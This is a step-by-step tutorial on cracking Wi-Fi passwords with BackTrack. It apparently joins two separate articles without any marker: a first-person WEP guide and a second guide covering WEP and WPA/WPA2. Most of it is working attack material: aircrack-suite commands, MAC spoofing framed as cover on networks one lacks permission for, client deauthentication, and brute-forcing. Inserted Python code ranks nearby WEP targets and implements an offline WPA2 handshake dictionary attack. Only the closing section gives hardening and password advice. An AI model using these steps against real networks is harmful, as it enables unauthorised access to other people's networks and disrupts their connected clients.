
How to Crack a Wi-Fi Network's WEP Password with BackTrack

You already know that if you want to lock down your Wi-Fi network, you should opt for WPA encryption because WEP is easy to crack. But did you know how easy? Take a look.

Note: This post demonstrates how to crack WEP passwords, an older and less often used network security protocol. If the network you want to crack is using the more popular WPA encryption, see our guide to cracking a Wi-Fi network's WPA password with Reaver instead (Reaver attacks the router's WPS PIN rather than WPA itself, so it only applies to access points with WPS switched on).

Today we're going to run down, step-by-step, how to crack a Wi-Fi network with WEP security turned on. But first, a word: knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise. Dozens of tutorials on how to crack WEP are already all over the internet using this method. Seriously, Google it. This ain't what you'd call "news." But what is surprising is that someone like me, with minimal networking experience, can get this done with free software and a cheap Wi-Fi adapter. Here's how it goes.

What You'll Need


Unless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:

- A compatible wireless adapter. This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter, pictured here, and it set me back about $50 on Amazon. Update: Don't do what I did. Get the Alfa AWUS036H, not the AWUS050NH, instead. The guy in the video below is using a $12 model he bought on eBay (and is even selling his router of choice). There are plenty of resources on getting aircrack-compatible adapters out there.
- A BackTrack Live CD. We already took you on a full screenshot tour of how to install and use BackTrack 3, the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. (If you go the VMware route, a USB adapter is the practical choice: VMware can hand a USB device straight to the guest, whereas the host's built-in Wi-Fi card reaches the guest as an ordinary virtual wired interface that cannot be put into monitor mode.)
- A nearby WEP-enabled Wi-Fi network. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it. The more use it gets while you collect the data you need to run your crack, the better your chances of success.
- Patience with the command line. This is a ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Crack That WEP


To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands. First run the following to get a list of your wireless interfaces:

airmon-ng

The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it everywhere a command includes (interface). Now, run the following four commands. See the output that I got for them in the screenshot below.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

If you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55. The order matters: the interface has to be down before macchanger can change its address, and it has to be in monitor mode (which is what airmon-ng start does) before airodump-ng can see raw frames and aireplay-ng can inject them. On newer BackTrack releases airmon-ng start creates a separate monitor interface, typically mon0, and that is the name to use in the commands below instead of the original interface. Now it's time to pick your network. Run:

airodump-ng (interface)

This lists the wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC column), not WPA or anything else.

Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands. Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to the clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name); airodump-ng appends a sequence number, so the capture will actually be written as (file name)-01.cap. I chose "yoyo," which is the name of the network I'm cracking.

You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Here the ESSID is the access point's SSID name, which in my case is yoyo. This is a fake authentication: it registers your spoofed MAC address with the access point so that the AP will accept the frames you inject in the next step. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:


aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Here we're creating router traffic to capture more throughput faster to speed up our crack. Specifically, aireplay-ng -3 is the ARP request replay attack: it waits for an ARP request on the network, then re-injects that same frame over and over, and the access point rebroadcasts each copy freshly encrypted with a new WEP initialization vector (IV). Those IVs, not the raw packet count, are what aircrack-ng needs. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the "#Data" column: you want it to go above 10,000. (Pictured below it's only at 854.) Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, though, because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many; 104-bit keys generally need more IVs than 40-bit ones.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)

Here the filename should be whatever you entered above for (file name), with the -01 suffix airodump-ng adds. You can browse to your Home directory to see it; it's the one with .cap as the extension. If you didn't get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:

The WEP key appears next to "KEY FOUND," as hex bytes separated by colons. Drop the colons and enter the hex digits as the WEP key to log onto the network.
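The wait on the "#Data" column is really a wait for unique WEP initialization vectors, and airodump-ng writes the same counters it shows on screen to a CSV file next to the capture ((file name)-01.csv, "# IV" column), so the check can be scripted rather than eyeballed. The Python below is an added example, not code from this article or from the aircrack-ng suite: it parses that CSV, picks out the WEP networks close enough to inject into, and reports whether each has crossed the threshold before you start aircrack-ng. The networks in the sample log are constructed for the example, the -70 dBm signal cutoff is an assumption, and the 10,000-IV threshold is the guide's own rule of thumb.

```python
import csv
import io

# Constructed sample of the CSV log airodump-ng writes beside the capture file
# ((file name)-01.csv). The column layout is the real tool's; the networks are
# invented for this example. The "# IV" column is the "#Data" counter shown on
# airodump-ng's live screen.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:AA, 2012-03-10 14:02:11, 2012-03-10 14:31:09,  6,  54, WEP , WEP, OPN, -32,   1812,  12417,   0.  0.  0.  0,   4, yoyo,
00:11:22:33:44:BB, 2012-03-10 14:02:13, 2012-03-10 14:31:08, 11,  54, WPA2, CCMP, PSK, -58,    930,      0,   0.  0.  0.  0,   8, neighbor,
00:11:22:33:44:CC, 2012-03-10 14:05:40, 2012-03-10 14:30:51,  1,  54, WEP , WEP, OPN, -84,    211,    854,   0.  0.  0.  0,   5, farap,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2012-03-10 14:06:02, 2012-03-10 14:31:09, -40,    12417, 00:11:22:33:44:AA,
"""


def parse_access_points(text):
    """Return the access-point table of an airodump-ng CSV as a list of dicts.

    The file holds two tables separated by a blank line (access points, then
    stations); only the first is parsed. ESSIDs containing a comma would need
    a smarter split and are not handled here.
    """
    ap_table = text.split("\n\n", 1)[0]
    reader = csv.reader(io.StringIO(ap_table), skipinitialspace=True)
    header = next(reader)
    if header[0].strip() != "BSSID":
        raise ValueError("not an airodump-ng CSV log")
    aps = []
    for row in reader:
        if len(row) < 14:        # skip blank or truncated lines
            continue
        aps.append({
            "bssid": row[0].strip(),
            "channel": int(row[3]),
            "privacy": row[5].strip(),   # "WEP", "WPA", "WPA2", "OPN", ...
            "power": int(row[8]),        # dBm: -32 is strong, -84 is weak
            "ivs": int(row[10]),         # unique IVs captured so far (#Data)
            "essid": row[13].strip(),
        })
    return aps


def wep_targets(aps, min_power_dbm=-70):
    """WEP networks strong enough to inject into, strongest first.
    The -70 dBm cutoff is an assumption for this example, not a guide figure."""
    hits = [ap for ap in aps
            if ap["privacy"] == "WEP" and ap["power"] >= min_power_dbm]
    return sorted(hits, key=lambda ap: ap["power"], reverse=True)


def ready_to_crack(ap, min_ivs=10_000):
    """The guide's rule of thumb: don't run aircrack-ng before #Data passes 10k."""
    return ap["ivs"] >= min_ivs


if __name__ == "__main__":
    for ap in wep_targets(parse_access_points(SAMPLE_CSV)):
        status = "ready" if ready_to_crack(ap) else "keep collecting"
        print(f'{ap["essid"]:10} ch {ap["channel"]:2} {ap["power"]:4} dBm '
              f'{ap["ivs"]:6} IVs  {status}')
```

Point it at the real (file name)-01.csv instead of SAMPLE_CSV and re-run it while the aireplay-ng window is busy; the IV count in the file advances with the "#Data" column, and the signal filter keeps you from wasting time on an access point that is too far away for injection to work.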

Problems Along the Way


With this article I set out to prove that cracking WEP is a relatively "easy" process for someone determined and willing to get the hardware and software going. I still think that's true, but unlike the guy in the video below, I had several difficulties along the way. In fact, you'll notice that the last screenshot up there doesn't look like the others; it's because it's not mine. Even though the AP which I was cracking was my own and in the same room as my Alfa, the power reading on the signal was always around -30, and so the data collection was very slow, and BackTrack would consistently crash before it was complete. After about half a dozen attempts (and trying BackTrack on both my Mac and PC, as a live CD and a virtual machine), I still haven't captured enough data for aircrack to decrypt the key. So while this process is easy in theory, your mileage may vary depending on your hardware, proximity to the AP, and the way the planets are aligned. Oh yeah, and if you're on deadline, Murphy's Law almost guarantees it won't work if you're on deadline.

This guide is meant to show how easy it is to hack wireless networks if the proper security measures are not in place. First I will show how to hack a WEP or WPA/WPA2 network and then I will give tips on how to avoid getting hacked. This is important information in our tech-savvy culture. If your wireless network is compromised you can be liable for any illegal activity on it. There are numerous stories of child pornographers and black-hat hackers using other people's wireless networks. NOTE: Hacking your neighbors' or anyone else's Wi-Fi without their permission is ILLEGAL. Be smart!

Step 1: What You Need

- A computer (a laptop works best).
- A wireless card capable of packet injection.
- If your laptop's wireless card can't do packet injection, you can purchase a wireless adapter such as the Netgear WG111 v2 for around $8-$12 on eBay.
- A live installation of BackTrack, either on a CD or a USB stick. BackTrack 5 can be found here; create a live USB install here.

Step 2: Hack WEP

WEP is the predecessor of WPA and has been broken for more than five years, yet people continue to use it. With the instructions below we can crack WEP in under 15 minutes. You can crack WEP from the command line, but there is an easy GUI in BackTrack which makes it a much less painful experience for those who are scared of command prompts.

1. Boot into BackTrack.
2. Click on the BackTrack applications menu -> BackTrack -> Exploitation Tools -> Wireless Exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng (this will open up the GUI seen in the picture).
3. Go to the Configuration tab and select the wireless interface wlan0. Click on Enable/Disable Monitor Mode (this will put the wireless card into monitor mode). Select the newly created mon0 interface.
4. Now click on the WEP tab at the top of the window.
- Click on "Start sniffing and logging" and leave the terminal open.
- Once the wireless network you want to crack shows up (it has to be WEP encryption, of course), select WEP Attacks (with clients). Note that the PWR has to be high enough to work, so the closer you can get, the better.
- There, click on Associate with AP using fake auth, wait a few seconds, and click on ARP request replay.
5. Once the Data number reaches over 10,000 you are ready to try to crack the key (if the data is coming fast, wait until 20,000 or 30,000 to be safe), but don't close any windows yet. Go to the Cracking tab and click on Aircrack-ng - Decrypt WEP password under WEP Cracking. It will take a few seconds to minutes to crack the password and then you are good to go.

Step 3: Hack WPA/WPA2

At least WPA and WPA2 are safe, right? Wrong. WPA and WPA2 with a pre-shared key are both crackable, but the time it takes depends on the strength of the passphrase. Boot into BackTrack and open up Konsole, the command-line utility built into BackTrack. It is the black box in the lower-left-hand corner (see image). We will now be entering the following commands into the command line, with explanations of what they do.

1. The following commands stop the wireless interface so you can change your MAC address. This is important because your MAC address is a unique identifier, so faking one is a good idea if you are accessing a network you don't have permission to (which, by the way, I wholly condemn).

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

2. The last of those commands put the card into monitor mode and created the mon0 interface. Running airodump-ng on it lets us see all of the wireless networks around us (see the first picture).

airodump-ng mon0

Now choose the network you want to hack and take note of the BSSID, the channel it is on, and the ESSID. The PWR has to be fairly high to be able to hack it; this is determined by how close you are to the wireless router. The closer you are, the better.

3. Once you have chosen the wireless network, enter the following into the terminal. This writes the captured packets into files named "filename-01.cap" and so on. We are trying to capture the four-way handshake between the router and a client: it does not contain the key itself, but it carries enough (both nonces, both MAC addresses and a MIC computed from the passphrase) to test candidate passphrases offline, which is what the cracking step does.

airodump-ng mon0 --channel * --bssid **:**:**:**:**:** -w filename

Once "WPA handshake: **:**:**:**:**:**" appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur, do step 4. That step is optional but highly recommended, as it speeds up the process a great deal.

4. aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0

This sends a deauthentication frame, spoofed from the access point given with -a, to the client given with -c. The client's wireless driver reconnects automatically, which generates a fresh handshake for airodump-ng to capture. This step ends once you have captured the handshake.

5. aircrack-ng -w wordlist.lst -b **:**:**:**:**:** filename.cap

Step 5 tries to crack the password in "filename.cap" using a list of words, here called "wordlist.lst". You can download a good 200 million word dictionary here (128MB, but unzipped is 800MB). Your computer has to derive a key from every passphrase in that list and check it against the handshake, but a computer can go through those 200 million passwords in 6-12 hours.

6. If the password isn't found in the dictionary you can try to brute-force the password with this command (note this could take a very long time depending on their password strength):

/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b **:**:**:**:**:** -w - filename.cap
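Step 5 works because the captured handshake lets the attacker test passphrases offline without ever talking to the router again. Here is that test written out in Python, added as an illustration and not code from this guide or from aircrack-ng: it derives the PMK with PBKDF2 exactly as 802.11i specifies, expands it to the key confirmation key, recomputes the MIC over a constructed EAPOL message 2 and compares it with the captured MIC for every candidate in the word list. The SSID, MAC addresses, nonces, frame and passphrase are all made up for the example; a real run would take them from filename.cap, which is what aircrack-ng does for you.

```python
import hashlib
import hmac
import struct

# Constructed handshake parameters. In a real attack these come out of the
# .cap file; they are invented here so the example runs offline.
SSID = "yoyo"
AP_MAC = bytes.fromhex("00aabbccddee")      # the -b / --bssid address
STA_MAC = bytes.fromhex("001122334455")     # the client that reconnected
ANONCE = bytes(range(32))                   # from EAPOL message 1 (AP -> client)
SNONCE = bytes(range(32, 64))               # from EAPOL message 2 (client -> AP)
MIC_OFFSET = 81   # EAPOL header (4) + key descriptor fields preceding Key MIC


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what make each dictionary candidate expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """First 16 bytes of the PTK (the Key Confirmation Key) via the 802.11i
    PRF: HMAC-SHA1 over the label, both MACs and both nonces in sorted order,
    so it does not matter which side sent which."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:16]


def build_eapol_msg2(snonce):
    """Constructed EAPOL-Key message 2 (WPA2, key descriptor version 2, CCMP)
    with the Key MIC field zeroed, laid out as the 802.11i key descriptor."""
    body = struct.pack(">BHHQ", 2, 0x010A, 16, 1)      # descriptor type, key info, key length, replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)  # key nonce, key IV, key RSC, key ID
    body += bytes(16) + struct.pack(">H", 0)          # key MIC (zeroed), key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL version 2, type 3 (EAPOL-Key)


def eapol_mic(kck, eapol_frame):
    """WPA2 MIC: HMAC-SHA1 over the whole EAPOL frame with the MIC field zeroed,
    truncated to 16 bytes (original WPA/TKIP uses HMAC-MD5 instead)."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def mic_for_candidate(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame):
    """The MIC the client would have sent if this passphrase were the real one."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
    return eapol_mic(kck, eapol_frame)


def dictionary_attack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic):
    """What aircrack-ng -w does with the handshake: derive the MIC each candidate
    would produce and compare it with the one the client actually sent.
    Returns the matching passphrase, or None if the list is exhausted."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8 to 63 characters
            continue
        mic = mic_for_candidate(candidate, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame)
        if hmac.compare_digest(mic, captured_mic):
            return candidate
    return None


def capture_handshake(real_passphrase):
    """Stand-in for the airodump-ng capture: the client's message-2 frame and the
    MIC it carried, computed with the passphrase the attacker does not know."""
    frame = build_eapol_msg2(SNONCE)
    mic = mic_for_candidate(real_passphrase, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame)
    return frame, mic


if __name__ == "__main__":
    frame, mic = capture_handshake("yoyo12345678")
    wordlist = ["password", "12345678", "yoyo", "yoyo12345678", "letmein1"]
    print("KEY FOUND:", dictionary_attack(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, mic))
```

Every candidate costs 4096 HMAC-SHA1 iterations plus the PRF, which is why a long passphrase that is not in any word list is what actually protects a WPA2-PSK network: the attacker's cost scales with the number of guesses, and nothing the router does after the handshake has been captured can slow that down.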

Step 4: Secure Your Own Wireless Network

Hopefully you gained some insight into how to keep your own wireless connection from being hacked:
1. Use WPA2 (WPA2-AES) if available, and by all means never use WEP.
2. Don't base your passphrase on a dictionary word. The next section focuses on passwords in general.
3. In your router settings you can usually hide your ESSID (the name of the wireless network). This adds only a small layer of security: airodump-ng still lists a hidden network by its BSSID, and the name travels in the clear as soon as a client connects.
4. Your router probably has a MAC-address filtering feature where you can specify the MAC addresses that are allowed to connect, so that only your approved devices can join your network (obviously a problem if you have a guest over who wants to connect to your Wi-Fi). Keep in mind that the MAC addresses of connected clients show up in airodump-ng's station list, and step 1 above already shows how easily one is spoofed with macchanger, so this stops only casual freeloaders.

Step 5: Passwords

You have to have good passwords in this day and age. If not, your credit card information, your personal information and your identity are available to those who want to use and abuse them. Here are some guidelines for coming up with a secure password:
1. At least 8 characters (that is also the minimum WPA2 allows for a passphrase; longer is much better).
2. At least one number, one letter and one special character, e.g. $ # % ^ @ !
3. NOT based on a dictionary word.
4. Multiple transitions, e.g. aaa111aaa111, not aaaa11111.

How can I remember these passwords? Come up with a word such as calculus and substitute numbers and other characters for letters, e.g. c@1cu1u$. This is still based on a dictionary word, though, so you should still make it harder, such as by appending something to the beginning or end. Bear in mind that these letter-for-symbol substitutions are part of every standard password-cracking rule set, so c@1cu1u$ falls only a little later than calculus does; extra length helps far more than substitutions. I also highly recommend using a different password for every website. How can you do this easily? Remember random variables in algebra? Have a variable in your password that is based on the website or some other information, e.g. XpasswordY, where the first X is the last letter of the website name and the last Y is the first letter of the website name. So the Instructables website password would be SpasswordI, your Facebook password would be KpasswordF and your Hotmail password would be LpasswordH. (Anyone who learns two of these can work out the rule, so the per-site letters are no substitute for genuinely different passwords.) It might seem like a lot, but it's worth the time to prevent the potential theft of your money and your identity, and your life being ruined.
